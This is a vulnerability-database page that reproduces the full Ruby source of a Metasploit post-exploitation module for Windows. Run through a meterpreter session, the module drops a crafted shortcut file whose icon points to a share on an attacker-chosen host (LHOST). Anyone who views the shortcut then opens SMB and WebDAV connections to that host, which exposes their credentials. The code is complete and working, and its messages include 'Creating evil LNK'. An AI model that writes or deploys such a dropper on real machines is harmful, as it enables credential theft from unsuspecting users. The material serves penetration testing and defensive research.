Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Windows Escalate SMB Icon LNK Dropper

🗓️ 16 Feb 2012 18:34:19Reported by mubix <[email protected]>Type 
metasploit
 metasploit🔗 www.rapid7.com👁 37 Views

Windows Escalate SMB Icon LNK Dropper module drops a shortcut that initiates SMB and WebDAV connections from any user viewing the shortcu

Code
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Post

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Windows Escalate SMB Icon LNK Dropper',
        'Description' => %q{
          This module drops a shortcut (LNK file) that has a ICON reference
          existing on the specified remote host, causing SMB and WebDAV
          connections to be initiated from any user that views the shortcut.
        },
        'License' => MSF_LICENSE,
        'Author' => [ 'mubix' ],
        'Platform' => [ 'win' ],
        'SessionTypes' => [ 'meterpreter' ],
        'Compat' => {
          'Meterpreter' => {
            'Commands' => %w[
              core_channel_eof
              core_channel_open
              core_channel_read
              core_channel_write
              stdapi_fs_getwd
            ]
          }
        }
      )
    )
    register_options(
      [
        OptAddress.new('LHOST', [ true, 'Host listening for incoming SMB/WebDAV traffic', nil]),
        OptString.new('LNKFILENAME', [ true, "Shortcut's filename", 'Words.lnk']),
        OptString.new('SHARENAME', [ true, 'Share name on LHOST', 'share1']),
        OptString.new('ICONFILENAME', [ true, "File name on LHOST's share", 'icon.png'])
      ]
    )
  end

  def run
    print_status 'Creating evil LNK'
    lnk = ''
    lnk << "\x4c\x00\x00\x00"                  # Header size
    lnk << "\x01\x14\x02\x00\x00\x00\x00\x00"  # Link CLSID
    lnk << "\xc0\x00\x00\x00\x00\x00\x00\x46"
    lnk << "\xdb\x00\x00\x00"                  # Link flags
    lnk << "\x20\x00\x00\x00"                  # File attributes
    lnk << "\x30\xcd\x9a\x97\x40\xae\xcc\x01"  # Creation time
    lnk << "\x30\xcd\x9a\x97\x40\xae\xcc\x01"  # Access time
    lnk << "\x30\xcd\x9a\x97\x40\xae\xcc\x01"  # Write time
    lnk << "\x00\x00\x00\x00"                  # File size
    lnk << "\x00\x00\x00\x00"                  # Icon index
    lnk << "\x01\x00\x00\x00"                  # Show command
    lnk << "\x00\x00"                          # Hotkey
    lnk << "\x00\x00"                          # Reserved
    lnk << "\x00\x00\x00\x00"                  # Reserved
    lnk << "\x00\x00\x00\x00"                  # Reserved
    lnk << "\x7b\x00"                          # IDListSize
    # sIDList
    lnk << "\x14\x00\x1f\x50\xe0\x4f\xd0\x20"
    lnk << "\xea\x3a\x69\x10\xa2\xd8\x08\x00"
    lnk << "\x2b\x30\x30\x9d\x19\x00\x2f"
    lnk << 'C:\\'
    lnk << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
    lnk << "\x00\x00\x00\x4c\x00\x32\x00\x00\x00\x00\x00\x7d\x3f\x5b\x15\x20"
    lnk << "\x00"
    lnk << 'AUTOEXEC.BAT'
    lnk << "\x00\x00\x30\x00\x03\x00\x04\x00\xef\xbe\x7d\x3f\x5b\x15\x7d\x3f"
    lnk << "\x5b\x15\x14\x00\x00\x00"
    lnk << Rex::Text.to_unicode('AUTOEXEC.BAT')
    lnk << "\x00\x00\x1c\x00\x00\x00"
    # sLinkInfo
    lnk << "\x3e\x00\x00\x00\x1c\x00\x00\x00\x01\x00"
    lnk << "\x00\x00\x1c\x00\x00\x00\x2d\x00\x00\x00\x00\x00\x00\x00\x3d\x00"
    lnk << "\x00\x00\x11\x00\x00\x00\x03\x00\x00\x00\x3e\x77\xbf\xbc\x10\x00"
    lnk << "\x00\x00\x00"
    lnk << 'C:\\AUTOEXEC.BAT'
    lnk << "\x00\x00\x0e\x00"
    # RELATIVE_PATH
    lnk << Rex::Text.to_unicode('.\\AUTOEXEC.BAT')
    lnk << "\x03\x00"
    # WORKING_DIR
    lnk << Rex::Text.to_unicode('C:\\')
    # ICON LOCATION
    lnk << "\x1c\x00"
    lnk << Rex::Text.to_unicode("\\\\#{datastore['LHOST']}\\#{datastore['SHARENAME']}\\#{datastore['ICONFILENAME']}`")
    lnk << "\x00\x00\x03\x00\x00\xa0\x58\x00\x00\x00\x00\x00\x00\x00"
    lnk << 'computer'
    lnk << "\x00\x00\x00\x00\x00\x00\x26\x4e\x06\x19\xf2\xa9\x31\x40\x91\xf0"
    lnk << "\xab\x9f\xb6\xb1\x6c\x84\x22\x03\x57\x01\x5e\x1d\xe1\x11\xb9\x48"
    lnk << "\x08\x00\x27\x6f\xe3\x1f\x26\x4e\x06\x19\xf2\xa9\x31\x40\x91\xf0"
    lnk << "\xab\x9f\xb6\xb1\x6c\x84\x22\x03\x57\x01\x5e\x1d\xe1\x11\xb9\x48"
    lnk << "\x08\x00\x27\x6f\xe3\x1f\x00\x00\x00\x00"

    print_status "Done. Writing to disk - #{session.fs.dir.pwd}\\#{datastore['LNKFILENAME']}"
    file = client.fs.file.new(datastore['LNKFILENAME'], 'wb')
    file.write(lnk)
    file.close
    print_status 'Done. Wait for evil to happen..'
  end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
08 Feb 2023 13:47Current
0.2Low risk
Vulners AI Score0.2
windowsescalatesmbiconlnkdroppershortcutremote hostsmb connectionswebdav connectionsmeterpreter
37